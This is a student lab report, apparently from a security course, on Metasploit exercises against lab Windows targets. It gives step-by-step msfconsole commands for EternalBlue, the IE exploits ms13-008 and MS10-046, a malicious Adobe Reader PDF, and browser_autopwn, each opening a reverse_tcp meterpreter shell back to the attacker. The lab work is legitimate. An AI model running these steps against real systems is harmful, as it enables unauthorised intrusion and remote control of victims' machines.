本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:
1.1一個主動攻擊實踐,如ms08_067; (1分)windows
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)瀏覽器
1.3 一個針對客戶端的攻擊,如Adobe;(1分)session
1.4 成功應用任何一個輔助模塊。(0.5分)tcp
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。工具
2.1主動攻擊實踐,ms17_010url
靶機: Windows Server 2008 R2 (x64)
在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
使用ms17_010模塊: msf > use exploit/windows/smb/ms17_010_eternalblue
設置payload:payload windows/x64/meterpreter/reverse_tcp
設置ip地址 set lhost +攻擊機ip地址 、set rhost +靶機ip地址
輸入exploit進行攻擊
攻擊成功:
3d
2.2.1 針對瀏覽器的攻擊,ms13-008code
靶機:IE 8 on Windows XP SP3
使用ms13-008模塊:use exploit/windows/browser/ie_cbutton_uaf
設置payloadset payload windows/meterpreter/reverse_tcp
設置攻擊機IP地址 set srvhost +攻擊機ip地址
設置lhost set lhost +攻擊機ip地址
exploit
orm
在靶機ie 8 瀏覽器輸入url連接
返回攻擊機輸入sessions -i +session id 進入meterpreter。
server
2.2.2MS10-046 (惟一,成功)
在攻擊機kali輸入msfconsole進入控制檯
使用ms10_046模塊
set SRVHOST +攻擊機ip
設置payload ,tcp反向回連
set LHOST +攻擊機ip
exploit 攻擊
靶機訪問url連接,彈出對話框點擊「容許」,會彈出一個攻擊者IP的目錄,其中有一個「快捷方式」的圖標,雙擊快捷方式,攻擊機方顯示成功創建會話。
使用sessions -i 1選擇會話,攻擊成功。
2.3. 針對客戶端的攻擊, adobe_toolbutton
靶機:Windows XP / Adobe Reader 9
使用adobe_toolbutton模塊:use exploit/windows/fileformat/adobe_toolbutton;
生成攻擊文件msf.pdf;
將文件傳給靶機;
輸入back返回;
設置監聽程序use exploit/multi/handler;
設置payload set payload windows/meterpreter/reverse_tcp;
設置攻擊機IP 地址;
輸入run進行攻擊;
當靶機用Adobe Reader 9 打開msf文件時,攻擊成功。
2.4 成功應用任何一個輔助模塊 browser autopwn
靶機:IE 8 on Windows XP SP3
•輸入use auxiliary/server/browser_autopwn
•設置 payload
設置攻擊機端口號
設置set LHOST 192.168.1.107
設置URIPATH
輸入exploit進行攻擊
靶機用瀏覽器打開url連接
輸入 session -i 1成功得到權限
用本身的話解釋什麼是exploit,payload,encode。
exploit:是攻擊者利用靶機的漏洞進行攻擊的一個過程。
payload:是攻擊者爲成功地實現對靶機的攻擊,須要在靶機上執行的一段代碼。
encode:是爲了可以使靶機順利的執行惡意代碼,利用encode對payload進行的加工。
本次試驗我先嚐試攻擊了中文版的win2008,winXP,win7這三個版本的系統,可是除了使用win2008能夠順利的完成第一個主動攻擊外,剩下兩個都沒用。最後我仍是換了一個英文版的winXP才順利的完成了接下來的任務。
我認爲我如今只能攻擊一下微軟已經放棄打補丁的winXP,偶爾運氣好還能夠成功地攻擊win2008和win7,等着微軟何時放棄了給win7打補丁,我再試試能不能用現有的工具攻破win7(仍是得說挑一些win7中打補丁少的)。雖然說如今使用win7的還有不少,但總的來講如今已經廣泛在使用win10了,而咱們攻擊的還只是舊版本的系統,有些跟不上時代了,更別說實戰了。